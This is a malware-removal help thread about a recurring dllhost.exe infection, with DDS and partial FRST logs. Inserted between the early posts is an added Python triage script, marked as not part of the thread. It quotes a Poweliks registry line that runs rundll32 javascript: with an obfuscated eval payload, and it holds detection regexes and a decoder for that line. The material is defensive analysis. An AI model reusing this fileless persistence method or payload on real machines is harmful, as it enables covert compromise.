
Help - dllhost.exe virus


This topic is locked
34 replies to this topic

#1 sjk117 (Members, 21 posts)

Posted 21 October 2014 - 09:19 PM

Hi, first time posting. It seems my computer has become infected with the "DLLHOST.EXE" replicating virus that consumes memory and continuously tries to reach external IP addresses. I see numerous instances of "dllhost.exe *32" in Task Manager Processes. I was able to download and install Malwarebytes using another computer and a jump drive, and several things were found and removed. The scan is clean now, but the dllhost processes and issues with downloads being blocked remain. I reviewed other threads for what appears to be the same issue, but I'm not sure where to start!

 

Please help!

Sue


Edited by sjk117, 22 October 2014 - 05:59 PM.




#2 sjk117 (Topic Starter, Members, 21 posts)

Posted 21 October 2014 - 10:31 PM

Running Windows 7 Home Premium 64-bit SP1. The infected computer has been removed from the internet; I downloaded DDS to a thumb drive with a clean computer and executed it on the infected machine. The computer was off and restarted right before I ran this, so there weren't any instances of "dllhost.exe *32" running as DDS was executed, but they were propagating all day while it was connected to the internet. ***UPDATE 10/22 9:40PM EDT: Connected the infected computer to the internet again. Watched Task Manager as I opened IE windows. Not seeing multiples of "dllhost.exe *32" in the process list, just a single dllhost.exe entry, but I still cannot download any files; I get a message that I do not have that privilege, although I am logged in as system admin.

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 10.0.9200.16798  BrowserJavaVersion: 10.71.2
Run by Greg at 23:58:39 on 2014-10-21
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6103.3149 [GMT -4:00]
.
AV: Norton 360 Premier Edition *Enabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton 360 Premier Edition *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton 360 Premier Edition *Enabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe
C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe
c:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
C:\Windows\system32\taskeng.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.yahoo.com/
mStart Page = hxxp://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
uProxyOverride = <-loopback>;192.168.*.*
mWinlogon: Userinit = userinit.exe,
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - <orphaned>
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\ips\ipsbho.dll
BHO: RoboForm Toolbar Helper: {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: {95B7759C-8C7F-4BF1-B163-73684A933233} - <orphaned>
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
TB: &RoboForm Toolbar: {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
TB: Google Toolbar: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
TB: &RoboForm Toolbar: {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coieplg.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [Seagate Dashboard] C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe --silent --no_ui
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
mRun: [BFHP] C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [Malwarebytes Anti-Exploit] C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
dRun: [Norton Download Manager{N360P204040-SHPD-FSD33017}] C:\Program Files (x86)\Norton One\Engine\3.2.0.19\ccSvcHst.exe /m
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F46} - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
IE: {320AF880-6646-11D3-ABEE-C5DBF3571F49} - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
IE: {724d43aa-0d85-11d4-9908-00400523e39a} - {724d43aa-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {119CE688-A7E9-1941-8E10-F42990BBA4C4} - hxxps://fiserv.assurity.com/reports/control/ASRrptview.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - hxxps://turborater.webex.com/client/WBXclient-T28L10NSP8EP1-15699/nbr/ieatgpc1.cab
TCP: NameServer = 216.144.187.199 24.229.54.212 204.186.80.229
TCP: Interfaces\{827104AF-A948-4FBA-84C0-08E22C6D3567} : DHCPNameServer = 216.144.187.199 24.229.54.212 204.186.80.229
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coieplg.dll
x64-BHO: RoboForm Toolbar Helper: {724d43a9-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - LocalServer32 - <no file>
x64-TB: &RoboForm Toolbar: {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coieplg.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {320AF880-6646-11D3-ABEE-C5DBF3571F46} - {320AF880-6646-11D3-ABEE-C5DBF3571F46} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-IE: {320AF880-6646-11D3-ABEE-C5DBF3571F49} - {320AF880-6646-11D3-ABEE-C5DBF3571F49} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-IE: {724d43aa-0d85-11d4-9908-00400523e39a} - {724d43aa-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
============= SERVICES / DRIVERS ===============
.
R0 amdkmpfd;AMD PCI Root Bus Lower Filter;C:\Windows\System32\drivers\amdkmpfd.sys [2013-10-16 36096]
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2013-10-23 630632]
R0 iaStorF;iaStorF;C:\Windows\System32\drivers\iaStorF.sys [2013-10-23 28008]
R0 iusb3hcs;Intel® USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-6-3 20464]
R0 SymDS;Symantec Data Store;C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys [2014-10-4 493656]
R0 SymEFA;Symantec Extended File Attributes;C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys [2014-10-4 1148120]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [2014-10-20 1587416]
R1 ccSet_MCLIENT;Norton One Settings Manager;C:\Windows\System32\drivers\MCLIENTx64\0302020.00C\ccsetx64.sys [2013-8-20 168096]
R1 ccSet_N360;N360 Settings Manager;C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys [2014-10-4 162392]
R1 ESProtectionDriver;Malwarebytes Anti-Exploit;C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [2014-10-21 63000]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.1.0.18\Definitions\IPSDefs\20141021.001\IDSviA64.sys [2014-10-21 633560]
R1 SymIRON;Symantec Iron Driver;C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys [2014-10-4 266968]
R1 SymNetS;Symantec Network Security WFP Driver;C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys [2014-10-4 593112]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2009-8-18 204288]
R2 DeviceMonitorService;DeviceMonitorService;C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [2012-9-7 87992]
R2 GsServer;GoodSync Server;C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe [2014-3-30 8574096]
R2 MbaeSvc;Malwarebytes Anti-Exploit Service;C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [2014-10-21 441144]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-10-21 1871160]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-10-21 968504]
R2 MCLIENT;Norton One;C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe [2013-8-20 143928]
R2 Motorola Device Manager;Motorola Device Manager Service;C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [2013-11-15 137528]
R2 N360;Norton 360;C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe [2014-10-4 265040]
R2 PST Service;PST Service;C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [2014-4-5 65657]
R2 RtkAudioService;Realtek Audio Service;C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [2013-11-28 289496]
R2 SeagateDashboardService;Seagate Dashboard Service;C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe [2011-6-1 14088]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-8-28 96256]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2014-9-9 142640]
R3 HECIx64;Intel® Management Engine Interface;C:\Windows\System32\drivers\HECIx64.sys [2009-9-17 56344]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2014-10-21 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2014-10-21 129752]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2014-10-21 63704]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2013-10-11 883928]
R3 SmbDrvI;SmbDrvI;C:\Windows\System32\drivers\Smb_driver_Intel.sys [2013-10-16 34544]
S0 amdkmafd;AMD Audio Bus Lower Filter;C:\Windows\System32\drivers\amdkmafd.sys [2013-10-16 21160]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S3 B-Service;B-Service; [x]
S3 hitmanpro37;HitmanPro 3.7 Support Driver;C:\Windows\System32\drivers\hitmanpro37.sys [2013-11-4 32512]
S3 MonitorFunction;Driver for Monitor;C:\Windows\System32\drivers\TVMonitor.sys [2013-1-22 16376]
S3 SmbDrv;SmbDrv;C:\Windows\System32\drivers\Smb_driver.sys [2012-8-15 22800]
S3 SWDUMon;SWDUMon;C:\Windows\System32\drivers\SWDUMon.sys [2013-9-5 16152]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2011-7-15 59392]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2011-7-14 1255736]
.
=============== File Associations ===============
.
FileExt: .txt: textfile="C:\Program Files (x86)\Windows NT\Accessories\WORDPAD.EXE" "%1" [UserChoice]
.
=============== Created Last 30 ================
.
2014-10-21 19:04:31 -------- d-----w- C:\ProgramData\Malwarebytes Anti-Exploit
2014-10-21 19:04:30 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Exploit
2014-10-21 16:23:32 129752 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-21 16:22:49 93400 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-21 16:22:49 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-21 16:22:49 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-10-21 16:22:49 -------- d-----w- C:\ProgramData\Malwarebytes
2014-10-21 16:22:49 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-20 23:42:29 -------- d-----w- C:\Users\Greg\AppData\Local\NPE
2014-10-15 21:38:40 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-10-15 18:42:02 -------- d-----w- C:\Users\Greg\AppData\Local\American Enterprise
2014-10-04 10:47:40 876248 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtsp64.sys
2014-10-04 10:47:40 593112 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symnets.sys
2014-10-04 10:47:40 493656 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symds64.sys
2014-10-04 10:47:40 37592 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\srtspx64.sys
2014-10-04 10:47:40 266968 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\ironx64.sys
2014-10-04 10:47:40 23568 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\symelam.sys
2014-10-04 10:47:40 1148120 ----a-w- C:\Windows\System32\drivers\N360x64\1506000.020\symefa64.sys
2014-10-04 10:47:39 162392 ----a-r- C:\Windows\System32\drivers\N360x64\1506000.020\ccsetx64.sys
2014-10-04 10:47:15 -------- d-----w- C:\Windows\System32\drivers\N360x64\1506000.020
.
==================== Find3M  ====================
.
2014-10-22 03:55:15 16152 ----a-w- C:\Windows\System32\drivers\SWDUMon.sys
2014-09-24 14:50:13 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-24 14:50:13 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-07-25 06:35:46 875688 ----a-w- C:\Windows\SysWow64\msvcr120_clr0400.dll
2014-07-25 03:47:06 869544 ----a-w- C:\Windows\System32\msvcr120_clr0400.dll
.
============= FINISH:  0:00:26.07 ===============
 


Edited by sjk117, 22 October 2014 - 08:45 PM.
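What Sue describes in posts #1 and #2 (32-bit dllhost.exe, the COM Surrogate, spawning over and over while the machine is online, and C:\Windows\syswow64\dllhost.exe sitting in the DDS process list) is how a Poweliks-style, registry-only autostart looks from Task Manager. The FRST log later in this thread pins it down: a CLSID localserver32 value whose "server" is rundll32.exe loading a javascript: URL through mshtml's RunHTMLApplication and eval() of obfuscated text, so every COM activation of that CLSID launches the surrogate. The Python below is an added triage example; it is not part of this thread and not part of DDS or FRST. It scans FRST-style log lines for that indicator, counts 32-bit dllhost.exe process entries, and undoes the per-character +1 code-point shift on the fragment of the eval string that is visible in the log. The sample lines are constructed from the log text quoted in this thread; the remainder of the registry value (the log notes 239 more characters) is not on the page and is not decoded.

```python
"""Triage helpers for the Poweliks-style indicator quoted in this thread.

Added example: not the thread's own content and not part of DDS or FRST.
"""
import re

# Indicator from the FRST line in post #4: a CLSID LocalServer32 value whose
# "server" is rundll32.exe loading a javascript: URL via mshtml's
# RunHTMLApplication. COM activations of that CLSID start the surrogate
# (dllhost.exe), which is why the 32-bit dllhost.exe keeps reappearing.
_LOCALSERVER32 = re.compile(r"\\localserver32\s*:", re.IGNORECASE)
_RUNDLL32_JS = re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.IGNORECASE)
_RUNHTA = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.IGNORECASE)
_EVAL_ARG = re.compile(r'eval\("(\S+)')
_DLLHOST32 = re.compile(r"\\SysWOW64\\dllhost\.exe\b", re.IGNORECASE)

# Constructed sample, assembled from the DDS/FRST output quoted in this thread.
SAMPLE_LOG_LINES = [
    r"C:\Windows\system32\svchost.exe -k DcomLaunch",
    r"C:\Windows\syswow64\dllhost.exe",
    r"(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe",
    r"HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\Winlogon: [Shell] C:\Windows\explorer.exe [2871808 2011-02-25] (Microsoft Corporation) <==== ATTENTION",
    r'HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!',
]


def find_poweliks_indicators(lines):
    """Return [(line_no, line)] where a LocalServer32 value runs rundll32 javascript:."""
    hits = []
    for no, line in enumerate(lines, start=1):
        if _LOCALSERVER32.search(line) and (_RUNDLL32_JS.search(line) or _RUNHTA.search(line)):
            hits.append((no, line))
    return hits


def count_dllhost32(lines):
    """Count process entries for the 32-bit COM Surrogate (dllhost.exe *32 in Task Manager).

    One instance can be legitimate; a count that keeps growing while the machine is
    online is the symptom described in this thread.
    """
    return sum(1 for line in lines if _DLLHOST32.search(line))


def extract_eval_payload(line):
    """Return the text passed to eval("...") in a registry value, or None.

    FRST truncates the value, so the match stops at the first whitespace, which is
    where the log's "(the data entry has ... more characters)" note begins.
    """
    m = _EVAL_ARG.search(line)
    return m.group(1) if m else None


def unshift(text, shift=1):
    """Undo a per-character code-point shift; the visible fragment uses +1."""
    return "".join(chr(ord(ch) - shift) for ch in text)


def triage(lines):
    """Summarise indicators in a log, decoding the visible eval fragment when present."""
    hits = find_poweliks_indicators(lines)
    decoded = []
    for _, line in hits:
        payload = extract_eval_payload(line)
        if payload:
            decoded.append(unshift(payload))
    return {
        "indicator_lines": [no for no, _ in hits],
        "dllhost32_entries": count_dllhost32(lines),
        "decoded_fragments": decoded,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG_LINES).items():
        print(f"{key}: {value}")
```

Run as-is, the script flags the localserver32 line, counts two 32-bit dllhost.exe entries, and decodes the visible fragment to document.write('<script language=jscr, i.e. JScript that writes a further script into the page rundll32 is rendering. On the live machine the same check is done against the registry value FRST reported rather than against the log text.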


#3 B-boy/StyLe/ (Bleepin' Freestyler, Malware Response Team, 8,307 posts, Location: Bulgaria)

Posted 25 October 2014 - 04:20 AM

Hello! Welcome to BleepingComputer Forums!
My name is Georgi and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will be working on your Malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms do not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

 

 

Regards,

Georgi




#4 sjk117 (Topic Starter, Members, 21 posts)

Posted 25 October 2014 - 08:58 AM

Thanks Georgi, my name is Sue. I appreciate your help. See logs below. I have isolated the infected computer from the internet; please tell me if any steps we take require an internet connection.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-10-2014
Ran by Greg (administrator) on KIBMAIN on 25-10-2014 09:47:29
Running from E:\
Loaded Profile: Greg (Available profiles: Greg)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
